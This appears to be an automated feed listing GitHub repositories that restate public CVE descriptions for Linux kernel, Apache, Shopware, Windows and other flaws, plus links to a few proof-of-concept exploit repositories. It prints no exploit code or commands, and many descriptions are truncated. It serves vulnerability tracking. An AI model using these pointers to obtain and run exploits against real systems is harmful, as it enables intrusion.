**Buffer overflow in net/ceph/auth_x.c in Ceph, as used in the Linux kernel before 3.16.3, allows remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a long unencrypted auth ticket. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6416](https://github.com/Live-Hack-CVE/CVE-2014-6416) create time: 2023-01-17T23:40:24Z

**The SMB2_tcon function in fs/cifs/smb2pdu.c in the Linux kernel before 3.16.3 allows remote CIFS servers to cause a denial of service (NULL pointer dereference and client system crash) or possibly have unspecified other impact by deleting the IPC$ share during resolution of DFS referrals. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-7145](https://github.com/Live-Hack-CVE/CVE-2014-7145) create time: 2023-01-17T23:40:20Z

**mm/memory.c in the Linux kernel before 4.1.4 mishandles anonymous pages, which allows local users to gain privileges or cause a denial of service (page tainting) via a crafted application that triggers writing to page zero. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3288](https://github.com/Live-Hack-CVE/CVE-2015-3288) create time: 2023-01-17T23:40:33Z

**The ecryptfs_privileged_open function in fs/ecryptfs/kthread.c in the Linux kernel before 4.6.3 allows local users to gain privileges or cause a denial of service (stack memory consumption) via vectors involving crafted mmap calls for /proc pathnames, leading to recursive pagefault handling. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1583](https://github.com/Live-Hack-CVE/CVE-2016-1583) create time: 2023-01-17T23:41:03Z

**The tcp_cwnd_reduction function in net/ipv4/tcp_input.c in the Linux kernel before 4.3.5 allows remote attackers to cause a denial of service (divide-by-zero error and system crash) via crafted TCP traffic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-2070](https://github.com/Live-Hack-CVE/CVE-2016-2070) create time: 2023-01-17T23:40:59Z

**Integer overflow in the xt_alloc_table_info function in net/netfilter/x_tables.c in the Linux kernel through 4.5.2 on 32-bit platforms allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3135](https://github.com/Live-Hack-CVE/CVE-2016-3135) create time: 2023-01-17T23:40:55Z

**arch/x86/kvm/vmx.c in the Linux kernel through 4.6.3 mishandles the APICv on/off state, which allows guest OS users to obtain direct APIC MSR access on the host OS, and consequently cause a denial of service (host OS crash) or possibly execute arbitrary code on the host OS, via x2APIC mode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4440](https://github.com/Live-Hack-CVE/CVE-2016-4440) create time: 2023-01-17T23:40:50Z

**The replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the Linux kernel before 4.5.5 does not properly maintain an fd data structure, which allows local users to gain privileges or cause a denial of service (use-after-free) via crafted BPF instructions that reference an incorrect file descriptor. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4557](https://github.com/Live-Hack-CVE/CVE-2016-4557) create time: 2023-01-17T23:40:46Z

**The InfiniBand (aka IB) stack in the Linux kernel before 4.5.3 incorrectly relies on the write system call, which allows local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4565](https://github.com/Live-Hack-CVE/CVE-2016-4565) create time: 2023-01-17T23:40:37Z

**mechanize, a library for automatically interacting with HTTP web servers, contains a regular expression that is vulnerable to regular expression denial of service (ReDoS) prior to version 0.4.6. If a web server responds in a malicious way, then mechanize could crash. Version 0.4.6 has a patch for the issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32837](https://github.com/Live-Hack-CVE/CVE-2021-32837) create time: 2023-01-17T23:39:20Z

**Git GUI is a convenient graphical tool that comes with Git for Windows. Its target audience is users who are uncomfortable with using Git on the command-line. Git GUI has a function to clone repositories. Immediately after the local clone is available, Git GUI will automatically post-process it, among other things runn CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41953](https://github.com/Live-Hack-CVE/CVE-2022-41953) create time: 2023-01-17T23:39:24Z

**Shopware is an open source commerce platform based on Symfony Framework and Vue js. The newsletter double opt-in validation was not checked properly, and it was possible to skip the complete double opt in process. As a result operators may have inconsistencies in their newsletter systems. This problem has been fixed wi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22734](https://github.com/Live-Hack-CVE/CVE-2023-22734) create time: 2023-01-17T23:39:46Z

**Shopware is an open source commerce platform based on Symfony Framework and Vue js. In affected versions the log module would write out all kind of sent mails. An attacker with access to either the local system logs or a centralized logging store may have access to other users accounts. This issue has been addressed in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22733](https://github.com/Live-Hack-CVE/CVE-2023-22733) create time: 2023-01-17T23:39:42Z

**Shopware is an open source commerce platform based on Symfony Framework and Vue js. The Administration session expiration was set to one week, when an attacker has stolen the session cookie they could use it for a long period of time. In version 6.4.18.1 an automatic logout into the Administration session has been adde CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22732](https://github.com/Live-Hack-CVE/CVE-2023-22732) create time: 2023-01-17T23:39:37Z

**Shopware is an open source commerce platform based on Symfony Framework and Vue js. In a Twig environment **without the Sandbox extension**, it is possible to refer to PHP functions in twig filters like `map`, `filter`, `sort`. This allows a template to call any global PHP function and thus execute arbitrary code. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22731](https://github.com/Live-Hack-CVE/CVE-2023-22731) create time: 2023-01-17T23:39:33Z

**Shopware is an open source commerce platform based on Symfony Framework and Vue js. In affected versions It was possible to put the same line item multiple times in the cart using the AP. The Cart Validators checked the line item's individuality and the user was able to bypass quantity limits in sales. This problem has CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22730](https://github.com/Live-Hack-CVE/CVE-2023-22730) create time: 2023-01-17T23:39:29Z

**A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-20001](https://github.com/Live-Hack-CVE/CVE-2006-20001) create time: 2023-01-17T21:26:19Z

**A vulnerability has been found in Sisimai up to 4.25.14p11 and classified as problematic. This vulnerability affects the function to_plain of the file lib/sisimai/string.rb. The manipulation leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. Upgrading to ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4891](https://github.com/Live-Hack-CVE/CVE-2022-4891) create time: 2023-01-17T21:26:06Z

**Prior to Apache HTTP Server 2.4.55, a malicious backend can cause the response headers to be truncated early, resulting in some headers being incorporated into the response body. If the later headers have any security purpose, they will not be interpreted by the client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37436](https://github.com/Live-Hack-CVE/CVE-2022-37436) create time: 2023-01-17T21:26:01Z

**Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.54 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36760](https://github.com/Live-Hack-CVE/CVE-2022-36760) create time: 2023-01-17T21:25:57Z

**Use of Out-of-range Pointer Offset in Homebrew mruby prior to 3.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0614](https://github.com/Live-Hack-CVE/CVE-2022-0614) create time: 2023-01-17T21:25:43Z

**NULL Pointer Dereference in mrb_vm_exec with super in GitHub repository mruby/mruby prior to 3.2. This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1201](https://github.com/Live-Hack-CVE/CVE-2022-1201) create time: 2023-01-17T21:25:39Z

**Out-of-bounds Read in mrb_obj_is_kind_of in in GitHub repository mruby/mruby prior to 3.2. # Impact: Possible arbitrary code execution if being exploited. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1427](https://github.com/Live-Hack-CVE/CVE-2022-1427) create time: 2023-01-17T21:25:34Z

**The 'LDAP Integration with Active Directory and OpenLDAP - NTLM & Kerberos Login' extension is vulnerable to LDAP Injection since is not properly sanitizing the 'username' POST parameter. An attacker can manipulate this paramter to dump arbitrary contents form the LDAP Database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23749](https://github.com/Live-Hack-CVE/CVE-2023-23749) create time: 2023-01-17T21:26:15Z

**Zoho ManageEngine Exchange Reporter Plus before 5708 allows attackers to conduct XXE attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22624](https://github.com/Live-Hack-CVE/CVE-2023-22624) create time: 2023-01-17T21:26:10Z

**Windows Win32k Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21680](https://github.com/Live-Hack-CVE/CVE-2023-21680) create time: 2023-01-17T21:25:53Z

**Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21681](https://github.com/Live-Hack-CVE/CVE-2023-21681) create time: 2023-01-17T21:25:48Z

**no description** : [bryanster/ioc-cve-2022-42475](https://github.com/bryanster/ioc-cve-2022-42475) create time: 2023-01-17T20:11:04Z

**A POC on how to exploit CVE-2022-27518** : [dolby360/CVE-2022-27518_POC](https://github.com/dolby360/CVE-2022-27518_POC) create time: 2023-01-17T19:40:04Z

**In libetpan a null pointer dereference in mailimap_mailbox_data_status_free in low-level/imap/mailimap_types.c was found that could lead to a remote denial of service or other potential consequences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4121](https://github.com/Live-Hack-CVE/CVE-2022-4121) create time: 2023-01-17T19:15:21Z

**A flaw was found in freeradius. A malicious RADIUS client or home server can send a malformed abinary attribute which can cause the server to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41861](https://github.com/Live-Hack-CVE/CVE-2022-41861) create time: 2023-01-17T19:15:16Z

**In freeradius, when an EAP-SIM supplicant sends an unknown SIM option, the server will try to look that option up in the internal dictionaries. This lookup will fail, but the SIM code will not check for that failure. Instead, it will dereference a NULL pointer, and cause the server to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41860](https://github.com/Live-Hack-CVE/CVE-2022-41860) create time: 2023-01-17T19:15:12Z

**In freeradius, the EAP-PWD function compute_password_element() leaks information about the password which allows an attacker to substantially reduce the size of an offline dictionary attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41859](https://github.com/Live-Hack-CVE/CVE-2022-41859) create time: 2023-01-17T19:15:08Z

**Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21546, CVE-2023-21556, CVE-2023-21679. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21555](https://github.com/Live-Hack-CVE/CVE-2023-21555) create time: 2023-01-17T19:15:39Z

**An information leak vulnerability was discovered in Samba's LDAP server. Due to missing access control checks, an authenticated but unprivileged attacker could discover the names and preserved attributes of deleted objects in the LDAP store. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-14628](https://github.com/Live-Hack-CVE/CVE-2018-14628) create time: 2023-01-17T19:14:59Z

**A flaw was found in the Linux kernel. A NULL pointer dereference may occur while a slip driver is in progress to detach in sl_tx_timeout in drivers/net/slip/slip.c. This issue could allow an attacker to crash the system or leak internal kernel information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41858](https://github.com/Live-Hack-CVE/CVE-2022-41858) create time: 2023-01-17T19:15:03Z

**Panasonic Sanyo CCTV Network Cameras versions 1.02-05 and 2.03-0x are vulnerable to CSRFs that can be exploited to allow an attacker to perform changes with administrator level privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4621](https://github.com/Live-Hack-CVE/CVE-2022-4621) create time: 2023-01-17T19:14:50Z

**RONDS EPM version 1.19.5 has a vulnerability in which a function could allow unauthenticated users to leak credentials. In some circumstances, an attacker can exploit this vulnerability to execute operating system (OS) commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3091](https://github.com/Live-Hack-CVE/CVE-2022-3091) create time: 2023-01-17T19:14:46Z

**RONDS EPM version 1.19.5 does not properly validate the filename parameter, which could allow an unauthorized user to specify file paths and download files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2893](https://github.com/Live-Hack-CVE/CVE-2022-2893) create time: 2023-01-17T19:14:41Z

**NLnet Labs Krill supports direct access to the RRDP repository content through its built-in web server at the "/rrdp" endpoint. Prior to 0.12.1 a direct query for any existing directory under "/rrdp/", rather than an RRDP file such as "/rrdp/notification.xml" as would be expected, causes Krill to crash. If the built-in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0158](https://github.com/Live-Hack-CVE/CVE-2023-0158) create time: 2023-01-17T19:14:54Z

**A vulnerability was found in Bricco Authenticator Plugin. It has been declared as critical. This vulnerability affects the function authenticate/compare of the file src/java/talentum/escenic/plugins/authenticator/authenticators/DBAuthenticator.java. The manipulation leads to sql injection. Upgrading to version 1.39 is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10013](https://github.com/Live-Hack-CVE/CVE-2013-10013) create time: 2023-01-17T18:06:28Z

**A vulnerability was found in evandro-machado Trabalho-Web2. It has been classified as critical. This affects an unknown part of the file src/java/br/com/magazine/dao/ClienteDAO.java. The manipulation leads to sql injection. The name of the patch is f59ac954625d0a4f6d34f069a2e26686a7a20aeb. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10061](https://github.com/Live-Hack-CVE/CVE-2015-10061) create time: 2023-01-17T18:06:32Z

**A vulnerability was found in nickzren alsdb. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version v2 is able to address this issue. The name of the patch is cbc79a68145e845f951113d184b4de207c341599. It is recommended to upgrade the affe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15021](https://github.com/Live-Hack-CVE/CVE-2016-15021) create time: 2023-01-17T18:06:37Z

**Project for the Cyberspace Security class.** : [xeno-john/joomla_CVE-2017-8917](https://github.com/xeno-john/joomla_CVE-2017-8917) create time: 2023-01-17T17:47:22Z

**Cross-site Scripting (XSS) - Reflected in GitHub repository lirantal/daloradius prior to master-branch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0338](https://github.com/Live-Hack-CVE/CVE-2023-0338) create time: 2023-01-17T18:06:46Z

**Cross-site Scripting (XSS) - Reflected in GitHub repository lirantal/daloradius prior to master-branch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0337](https://github.com/Live-Hack-CVE/CVE-2023-0337) create time: 2023-01-17T18:06:42Z

**Windows SMB Witness Service Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21549](https://github.com/Live-Hack-CVE/CVE-2023-21549) create time: 2023-01-17T18:06:19Z

**Microsoft Cryptographic Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21561, CVE-2023-21730. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21551](https://github.com/Live-Hack-CVE/CVE-2023-21551) create time: 2023-01-17T18:06:14Z

**A vulnerability was found in ollpu parontalli. It has been classified as critical. Affected is an unknown function of the file httpdocs/index.php. The manipulation of the argument s leads to sql injection. The name of the patch is 6891bb2dec57dca6daabc15a6d2808c8896620e5. It is recommended to apply a patch to fix this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20170](https://github.com/Live-Hack-CVE/CVE-2017-20170) create time: 2023-01-17T15:56:30Z

**Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to Cross Site Scripting (XSS) via process_update_profile.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48091](https://github.com/Live-Hack-CVE/CVE-2022-48091) create time: 2023-01-17T15:56:45Z

**Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to SQL Injection via /app/dao/CustomerDAO.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48090](https://github.com/Live-Hack-CVE/CVE-2022-48090) create time: 2023-01-17T15:56:41Z

**Gatsby is a free and open source framework based on React that helps developers build websites and apps. The gatsby-transformer-remark plugin prior to versions 5.25.1 and 6.3.2 passes input through to the `gray-matter` npm package, which is vulnerable to JavaScript injection in its default configuration, unless input i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22491](https://github.com/Live-Hack-CVE/CVE-2023-22491) create time: 2023-01-17T15:56:54Z

**Flarum is a discussion platform for websites. If the first post of a discussion is permanently deleted but the discussion stays visible, any actor who can view the discussion is able to create a new reply via the REST API, no matter the reply permission or lock status. This includes users that don't have a validated em CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22489](https://github.com/Live-Hack-CVE/CVE-2023-22489) create time: 2023-01-17T15:56:50Z

**Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21547](https://github.com/Live-Hack-CVE/CVE-2023-21547) create time: 2023-01-17T15:56:24Z

**Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21555, CVE-2023-21556, CVE-2023-21679. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21546](https://github.com/Live-Hack-CVE/CVE-2023-21546) create time: 2023-01-17T15:56:18Z

**Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21546, CVE-2023-21555, CVE-2023-21556, CVE-2023-21679. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21543](https://github.com/Live-Hack-CVE/CVE-2023-21543) create time: 2023-01-17T15:56:14Z

**Windows Cryptographic Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21540, CVE-2023-21559. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21550](https://github.com/Live-Hack-CVE/CVE-2023-21550) create time: 2023-01-17T15:56:08Z

**Windows Cryptographic Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21540, CVE-2023-21550. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21559](https://github.com/Live-Hack-CVE/CVE-2023-21559) create time: 2023-01-17T15:56:04Z

**Microsoft Cryptographic Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21551, CVE-2023-21730. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21561](https://github.com/Live-Hack-CVE/CVE-2023-21561) create time: 2023-01-17T15:55:59Z

**CVE-2022-46463(POC)** : [nu0l/CVE-2022-46463](https://github.com/nu0l/CVE-2022-46463) create time: 2023-01-17T14:58:14Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in simplesamlphp simplesamlphp-module-openidprovider up to 0.8.x. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file templates/trust.tpl.php. The manipulation of the argumen CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10008](https://github.com/Live-Hack-CVE/CVE-2010-10008) create time: 2023-01-17T11:31:45Z

**CVE-2014-5460** : [brookeses69/CVE-2014-5460](https://github.com/brookeses69/CVE-2014-5460) create time: 2023-01-17T12:35:56Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26385](https://github.com/Live-Hack-CVE/CVE-2021-26385) create time: 2023-01-17T11:32:17Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26319](https://github.com/Live-Hack-CVE/CVE-2021-26319) create time: 2023-01-17T11:32:13Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26358](https://github.com/Live-Hack-CVE/CVE-2021-26358) create time: 2023-01-17T11:32:08Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26357](https://github.com/Live-Hack-CVE/CVE-2021-26357) create time: 2023-01-17T11:32:04Z

**An issue was discovered in the Arm Mali GPU Kernel Driver. There is a use-after-free. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r13p0 through r32p0, Bifrost r1p0 through r40p0, and Valhall r19p0 through r40p0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46891](https://github.com/Live-Hack-CVE/CVE-2022-46891) create time: 2023-01-17T11:31:50Z

**ruby-git versions prior to v1.13.0 allows a remote authenticated attacker to execute an arbitrary ruby code by having a user to load a repository containing a specially crafted filename to the product. This vulnerability is different from CVE-2022-46648. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47318](https://github.com/Live-Hack-CVE/CVE-2022-47318) create time: 2023-01-17T11:30:59Z

**ruby-git versions prior to v1.13.0 allows a remote authenticated attacker to execute an arbitrary ruby code by having a user to load a repository containing a specially crafted filename to the product. This vulnerability is different from CVE-2022-47318. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46648](https://github.com/Live-Hack-CVE/CVE-2022-46648) create time: 2023-01-17T11:30:51Z

**The SafeSocks option in Tor before 0.4.7.13 has a logic error in which the unsafe SOCKS4 protocol can be used but not the safe SOCKS4a protocol, aka TROVE-2022-002. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23589](https://github.com/Live-Hack-CVE/CVE-2023-23589) create time: 2023-01-17T11:31:59Z

**A vulnerability was found in SourceCodester Online Food Ordering System 2.0. It has been classified as critical. Affected is an unknown function of the file admin/manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0332](https://github.com/Live-Hack-CVE/CVE-2023-0332) create time: 2023-01-17T11:31:55Z

**CX-Motion-MCH v2.32 and earlier contains an access of uninitialized pointer vulnerability. Having a user to open a specially crafted project file may lead to information disclosure and/or arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22366](https://github.com/Live-Hack-CVE/CVE-2023-22366) create time: 2023-01-17T11:31:40Z

**Active debug code exists in OMRON CP1L-EL20DR-D all versions, which may lead to a command that is not specified in FINS protocol being executed without authentication. A remote unauthenticated attacker may read/write in arbitrary area of the device memory, which may lead to overwriting the firmware, causing a denial-of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22357](https://github.com/Live-Hack-CVE/CVE-2023-22357) create time: 2023-01-17T11:31:36Z

**Hidden functionality vulnerability in PIX-RT100 versions RT100_TEQ_2.1.1_EQ101 and RT100_TEQ_2.1.2_EQ101 allows a network-adjacent attacker to access the product via undocumented Telnet or SSH services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22316](https://github.com/Live-Hack-CVE/CVE-2023-22316) create time: 2023-01-17T11:31:32Z

**OS command injection vulnerability in PIX-RT100 versions RT100_TEQ_2.1.1_EQ101 and RT100_TEQ_2.1.2_EQ101 allows a network-adjacent attacker who can access product settings to execute an arbitrary OS command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22304](https://github.com/Live-Hack-CVE/CVE-2023-22304) create time: 2023-01-17T11:31:27Z

**TP-Link SG105PE firmware prior to 'TL-SG105PE(UN) 1.0_1.0.0 Build 20221208' contains an authentication bypass vulnerability. Under the certain conditions, an attacker may impersonate an administrator of the product. As a result, information may be obtained and/or the product's settings may be altered with the privilege CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22303](https://github.com/Live-Hack-CVE/CVE-2023-22303) create time: 2023-01-17T11:31:22Z

**MAHO-PBX NetDevancer Lite/Uni/Pro/Cloud prior to Ver.1.11.00, MAHO-PBX NetDevancer VSG Lite/Uni prior to Ver.1.11.00, and MAHO-PBX NetDevancer MobileGate Home/Office prior to Ver.1.11.00 allow a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22280](https://github.com/Live-Hack-CVE/CVE-2023-22280) create time: 2023-01-17T11:31:17Z

**Open redirect vulnerability in pgAdmin 4 versions prior to v6.14 allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22298](https://github.com/Live-Hack-CVE/CVE-2023-22298) create time: 2023-01-17T11:31:13Z

**Reflected cross-site scripting vulnerability in MAHO-PBX NetDevancer series MAHO-PBX NetDevancer Lite/Uni/Pro/Cloud prior to Ver.1.11.00, MAHO-PBX NetDevancer VSG Lite/Uni prior to Ver.1.11.00, and MAHO-PBX NetDevancer MobileGate Home/Office prior to Ver.1.11.00 allows a remote unauthenticated attacker to inject an arb CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22296](https://github.com/Live-Hack-CVE/CVE-2023-22296) create time: 2023-01-17T11:31:08Z

**Cross-site request forgery (CSRF) vulnerability in MAHO-PBX NetDevancer Lite/Uni/Pro/Cloud prior to Ver.1.11.00, MAHO-PBX NetDevancer VSG Lite/Uni prior to Ver.1.11.00, and MAHO-PBX NetDevancer MobileGate Home/Office prior to Ver.1.11.00 allows a remote unauthenticated attacker to hijack the user authentication and con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22286](https://github.com/Live-Hack-CVE/CVE-2023-22286) create time: 2023-01-17T11:31:03Z

**MAHO-PBX NetDevancer Lite/Uni/Pro/Cloud prior to Ver.1.11.00, MAHO-PBX NetDevancer VSG Lite/Uni prior to Ver.1.11.00, and MAHO-PBX NetDevancer MobileGate Home/Office prior to Ver.1.11.00 allow a remote unauthenticated attacker to execute an arbitrary OS command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22279](https://github.com/Live-Hack-CVE/CVE-2023-22279) create time: 2023-01-17T11:30:55Z

**m-FILTER prior to Ver.5.70R01 (Ver.5 Series) and m-FILTER prior to Ver.4.87R04 (Ver.4 Series) allows a remote unauthenticated attacker to bypass authentication and send users' unintended email when email is being sent under the certain conditions. The attacks exploiting this vulnerability have been observed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22278](https://github.com/Live-Hack-CVE/CVE-2023-22278) create time: 2023-01-17T11:30:47Z

**no description** : [jsirichai/CVE-2022-23540-PoC](https://github.com/jsirichai/CVE-2022-23540-PoC) create time: 2023-01-17T10:34:10Z

**no description** : [pazhanivel07/frameworks_av-r33_CVE-2022-20413](https://github.com/pazhanivel07/frameworks_av-r33_CVE-2022-20413) create time: 2023-01-17T10:33:22Z

**no description** : [notareaperbutDR34P3r/CVE-2022-40684-Rust](https://github.com/notareaperbutDR34P3r/CVE-2022-40684-Rust) create time: 2023-01-17T07:49:25Z

**Incorrect Default Permissions vulnerability in Hitachi Tuning Manager on Linux (Hitachi Tuning Manager server, Hitachi Tuning Manager - Agent for RAID, Hitachi Tuning Manager - Agent for NAS, Hitachi Tuning Manager - Agent for SAN Switch components) allows local users to read and write specific files.This issue affects CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36611](https://github.com/Live-Hack-CVE/CVE-2020-36611) create time: 2023-01-17T07:07:13Z

**A vulnerability exists in the FTP server of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0, which processes symbolic links on external storage media. A local authenticated attacker with administrator privileges could abuse this vulnerability to access the root file system by creating a symbolic link on external CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45440](https://github.com/Live-Hack-CVE/CVE-2022-45440) create time: 2023-01-17T07:07:08Z

**A pair of spare WiFi credentials is stored in the configuration file of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0 in cleartext. An unauthenticated attacker could use the credentials to access the WLAN service if the configuration file has been retrieved from the device by leveraging another known vulnerabil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45439](https://github.com/Live-Hack-CVE/CVE-2022-45439) create time: 2023-01-17T07:07:03Z

**Auth. SQL Injection (SQLi) vulnerability in Adeel Ahmed's IP Blacklist Cloud plugin <= 5.00 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43462](https://github.com/Live-Hack-CVE/CVE-2022-43462) create time: 2023-01-17T07:06:53Z

**Auth. Stored Cross-Site Scripting (XSS) vulnerability in Adeel Ahmed's IP Blacklist Cloud plugin <= 5.00 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42462](https://github.com/Live-Hack-CVE/CVE-2022-42462) create time: 2023-01-17T07:06:48Z

**Cross-Site Request Forgery (CSRF) in MiKa's OSM – OpenStreetMap plugin <= 6.0.1 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30544](https://github.com/Live-Hack-CVE/CVE-2022-30544) create time: 2023-01-17T07:06:45Z

